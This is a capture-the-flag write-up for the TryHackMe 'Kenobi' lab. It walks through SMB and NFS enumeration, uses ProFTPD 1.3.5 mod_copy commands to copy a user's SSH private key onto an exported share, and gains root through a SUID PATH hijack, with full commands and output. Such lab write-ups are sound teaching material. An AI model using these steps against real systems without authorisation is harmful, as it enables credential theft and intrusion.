Room: https://tryhackme.com/room/kenobi
Enumeration
Port Scan (nmap)
nmap -sV -v 10.10.68.196
Running our nmap scan, we get 7 ports back that are open. An FTP drive, SSH, web server, and Samba smb most notably.
SMB Enumeration
nmap has a script to enumerate over smb, so let’s run that:
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.68.196
We get back three SMB drives: IPC$, anonymous and print$. let’s investigate the anonymous one:
# log into the anonymous share, just press enter for password
┌──(kali㉿kali)-[~/thm]
└─$ smbclient //10.10.68.196/anonymous 130 ⨯ 1 ⚙
Enter WORKGROUP\\kali's password:
Try "help" to get a list of possible commands.
# we run ls and see a log.txt
smb: \\> ls
. D 0 Wed Sep 4 06:49:09 2019
.. D 0 Wed Sep 4 06:56:07 2019
log.txt N 12237 Wed Sep 4 06:49:09 2019
9204224 blocks of size 1024. 6877112 blocks available
# let us logout
smb: \\> exit
# and lets run smbget to grab that file
┌──(kali㉿kali)-[~/thm]
└─$ smbget -U anonymous smb://10.10.68.196/anonymous/log.txt 1 ⚙
Password for [anonymous] connecting to //anonymous/10.10.68.196:
Using workgroup WORKGROUP, user anonymous
smb://10.10.68.196/anonymous/log.txt
Downloaded 11.95kB in 3 seconds
RPC Bind Enumeration
We know from our nmap scan 111 is running rpcbind, in our case it’s an nfs drive so we can use nmap as well to enumerate
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.68.196
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
We know about the /var drive
Gain Access
The server is running ProFTPd and some versions could be vulnerable. We can use netcat to access and see what version it is running:
┌──(kali㉿kali)-[~/thm]
└─$ nc 10.10.68.196 21 1 ⚙
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.68.196]
And now use searchsploit to look for any exploits:
┌──(kali㉿kali)-[~/thm]
└─$ searchsploit proftpd 1.3.5 2 ⨯ 1 ⚙
------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We have 3 exploits! They are based around the mod_copy
module which implements SITE CPFR (copy from) and SITE CPTO (copy to) commands. Earlier, we downloaded the log file from the server and after reading through it, we can see the the service is running as the Kenobi user and there is an ssh key for that user. So let’s log back into the FTP and try to copy that ssh key to /var, which is the directory running an NFS that we could mount to in order to grab the key for ourselves.
┌──(kali㉿kali)-[~/thm]
└─$ nc 10.10.68.196 21 1 ⚙
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.68.196]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
Great! Now we need to exit (Ctrl +C
) and mount to /var in order to grab this key:
┌──(kali㉿kali)-[~/thm]
└─$ sudo mkdir /mnt/kenobiNFS
┌──(kali㉿kali)-[~/thm]
└─$ sudo mount 10.10.68.196:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~/thm]
└─$ ls -la /mnt/kenobiNFS 1 ⚙
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Mar 22 11:49 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 29 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Mar 22 11:48 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
We’re in! Now let’s grab the key from /var/tmp
and use it to login:
┌──(kali㉿kali)-[~/thm]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa . 1 ⚙
┌──(kali㉿kali)-[~/thm]
└─$ sudo chmod 600 id_rsa 1 ⚙
┌──(kali㉿kali)-[~/thm]
└─$ ssh -i id_rsa [email protected]
kenobi@kenobi:~$
And now we can cat user.txt
for the flag!
PrivEsc
We have access as kenobi, but let’s gain root access. Let’s search for any executables running with a SUID set:
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
One interesting one is /usr/bin/menu
. Which if we execute, seems to be a custom menu interface created to run certain commands like checking the web interface, kernel version or ip address:
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
By running strings /usr/bin/menu
we can see what commands it is running:
curl -I localhost
uname -r
ifconfig
So we could modify our PATH to override one of these commands to gain us a root shell. The room does this as curl, but I am going to do it as ifconfig, because no options are selected with it.
# cd to the temp directory
kenobi@kenobi:~$ cd /tmp
# clone the /bin/sh shell as ifconfig
kenobi@kenobi:/tmp$ echo /bin/sh > ifconfig
# give it full permissions
kenobi@kenobi:/tmp$ chmod 777 ifconfig
# add our tmp directory containing our fake ifconfig to our PATH
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
# rerun the menu and choose ifconfig option
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
# whoami
root
And we are in! Now let’s check out root’s home directory cat /root
and check out the flag cat root.txt
!
Machine Compendium
{
"MACHINE_IP": "10.10.68.196",
"MACHINE_INFO" : {
"os": "Ubuntu Linux",
"host": "KENOBI"
},
"OPEN_PORTS": {
"21": ["ftp", "ProFTPD 1.3.5"],
"22": ["ssh", "OpenSSH 7.2p2 Ubuntu 4ubuntu2.7"],
"80": ["http", "Apache httpd 2.4.18"],
"111": ["rpcbind", "2-4 (RPC #100000)"],
"139": ["netbios-ssn", "Samba smbd 3.X - 4.X"],
"445": ["netbios-ssn", "Samba smbd 3.X - 4.X"],
"2049": ["nfs_acl", "2-3 (RPC #100227)"]
},
"SMB":{
"paths": ["\\\\10.10.68.196\\IPC$","\\\\10.10.68.196\\anonymous","\\\\10.10.68.196\\print$"]
},
"CREDENTIALS":{
},
"OTHER_INFO": {
"vulnerabilities": ["ProFTPD 1.3.5"]
}
}
Comments
No comments available.